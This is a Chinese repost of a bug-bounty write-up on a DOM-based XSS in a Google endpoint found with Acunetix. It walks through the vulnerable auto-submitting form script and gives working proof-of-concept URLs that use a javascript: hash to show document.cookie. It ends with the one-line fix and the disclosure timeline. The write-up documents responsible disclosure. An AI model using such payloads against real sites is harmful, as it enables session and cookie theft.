内容简介:你可能是一个比较懒惰的黑客,直接不想去挖掘Google的漏洞,而我和朋友linkks只是稍微勤快和幸运一点,再配合上漏扫利器Acunetix Vulnerability Scanner,就发现了Google的一个XSS漏洞,收获了$5000。我们平时的一项业余研究就是,使用Acunetix在内的各种安全扫描工具去扫描测试不同的Google服务,在我们的测试目录里有好多目标需要一一进行扫描。2019年12月当我们用Acunetix扫描Google的某项服务时,突然跳出一项XSS漏洞安全警告,其扫描测试Payl
你可能是一个比较懒惰的黑客,直接不想去挖掘Google的漏洞,而我和朋友linkks只是稍微勤快和幸运一点,再配合上漏扫利器Acunetix Vulnerability Scanner,就发现了Google的一个XSS漏洞,收获了$5000。
第一步 Acunetix Vulnerability Scanner跳出的一条安全警告
我们平时的一项业余研究就是,使用Acunetix在内的各种安全扫描 工具 去扫描测试不同的Google服务,在我们的测试目录里有好多目标需要一一进行扫描。2019年12月当我们用Acunetix扫描Google的某项服务时,突然跳出一项XSS漏洞安全警告,其扫描测试Payload为:
https://google.ws/ajax/pi/fbfr?wvstest=javascript:domxssExecutionSink(1,%22%27%5C%22%3E%3Cxsstag%3E()locxss%22)
通常来说,这类型的漏洞警告大多都是误报,我们一般都不会跟进处理,但这个目标是Google啊,所以值得深究一番。
第二步 分析HTTP请求的响应
首先,我们来看看上个漏洞警告涉及的HTTP响应内容,如下:
HTTP/1.1 200 OK ... <!doctype html><div> <form method="post"> </form> <script nonce="+ao+4Egc+7YExl3qyyWMJg==">(function(){var a=window.document.forms[0],b=location.hash.substr(1);b||window.close();var c=b.split("&"),d=decodeURIComponent(c[0]);a.action=d;for(var e=1;e<c.length;e++){var f=c[e].split("="),g=document.createElement("input");g.type="hidden";g.name=f[0];g.value=decodeURIComponent(f[1]);a.appendChild(g)}a.submit();}).call(this);</script> </div>
分析来看,该响应包括一个空的form格式,以及一些JS片段代码。为了实现更好的可读性,重新把其中的JS代码整理如下:
(function() { var a = window.document.forms[0], b = location.hash.substr(1); b || window.close(); var c = b.split("&"), d = decodeURIComponent(c[0]); a.action = d; for (var e = 1; e < c.length; e++) { var f = c[e].split("="), g = document.createElement("input"); g.type = "hidden"; g.name = f[0]; g.value = decodeURIComponent(f[1]); a.appendChild(g) } a.submit(); }).call(this);
接下来,我们就仔细分析上述JS代码,为此,我们加上一些注释来进行理解:
(function() { // Function that is going to be auto-executed }).call(this); (function() { // The variable “a” points to a form that is empty right now var a = window.document.forms[0], // The variable b is a location hash without the # character b = location.hash.substr(1); // If there is no b (no hash in the location URI), try to self-close b || window.close(); // Split the location hash using the & character var c = b.split("&"), // And decode the first (zero) element d = decodeURIComponent(c[0]); // The hash value becomes the action of the form a.action = d; // The below content is not important in the context of the issue for (var e = 1; e < c.length; e++) { var f = c[e].split("="), g = document.createElement("input"); g.type = "hidden"; g.name = f[0]; g.value = decodeURIComponent(f[1]); a.appendChild(g) } // The form is auto-submitted a.submit(); }).call(this);
第三步 构造恰当的Payload触发XSS漏洞
如果理解了上述JS代码的具体含义,之后就是构造恰当的Payload实现XSS触发了,如下Payload成功实现了Google上的XSS,返回当前用户Cookie信息:
https://google.ws/ajax/pi/fbfr#javascript:alert(document.cookie)
另外,我们还发现,其它的Google服务端也会受到该XSS漏洞影响:
https://google.com/ajax/pi/fbfr#javascript:alert(document.cookie)
漏洞修复
漏洞修复很简单,只需要在上述JS中增加一行代码 0 != d.indexOf(“http”) && window.close(),判断URL的location hash,即#后面的开始的字段以http开始,就能消除漏洞。
(function() { var a = window.document.forms[0], b = location.hash.substr(1); b || window.close(); var c = b.split("&"), d = decodeURIComponent(c[0]); // Only the below line needed to be changed // to check if the location hash begins with http: 0 != d.indexOf("http") && window.close(); a.action = d; for (var e = 1; e < c.length; e++) { var f = c[e].split("="), g = document.createElement("input"); g.type = "hidden"; g.name = f[0]; g.value = decodeURIComponent(f[1]); a.appendChild(g) } a.submit(); }).call(this);
漏洞上报和处理进程
2019.12.27 漏洞上报 2019.12.27 漏洞分类 2020.1.8 Google修复漏洞 2020.1.8 Google发放赏金$5000
*参考来源: acunetix ,clouds 编译整理,转载请注明来自 FreeBuf.COM
以上就是本文的全部内容,希望本文的内容对大家的学习或者工作能带来一定的帮助,也希望大家多多支持 码农网
猜你喜欢:- 挖洞经验 | 看我如何发现Facebook的$5000美金漏洞
- 挖洞经验 | 价值$6500美金的Instagram发贴文字说明添加漏洞
- 挖洞经验 | 看我如何发现Facebook安卓APP的$8500美金Webview漏洞
- Sahil 创建十亿美金公司的失败反思
- 满币网疑被盗1亿美金 官方声称维护
- [译] ConvertKit 成长故事:0 到月入 150 万美金
本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们。
VC++.NET入门
Davis Chapman / 中国电力出版社 / 2003-5 / 55.0
《VC++.NET入门》提供了学习Visual C++工具的循序渐进的指导和创建应用程序的向导。你将学习设计应用程序窗口、使用控件、显示图形、创建SDI和MDI应用程序、操作数据库以及创建多任务程序,也将学习在微软的新.E平台下使用Visual C++的一些基本技巧,以及学习它影响设计和编写应用程序的方式。一起来看看 《VC++.NET入门》 这本书的介绍吧!